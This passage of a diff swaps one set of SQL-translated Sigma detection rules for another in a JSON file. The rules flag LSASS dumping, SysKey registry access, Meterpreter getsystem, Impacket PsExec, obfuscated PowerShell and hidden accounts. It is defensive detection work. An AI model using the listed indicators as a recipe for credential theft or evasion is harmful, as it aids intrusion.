ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - 
"attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + 
"attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Legitimate 
administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" 
], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. 
This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', 
'4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "status": "test", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Office Macro File Creation 
From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Suspicious Scheduled Task Creation", + "id": 
"3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE 
'%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 
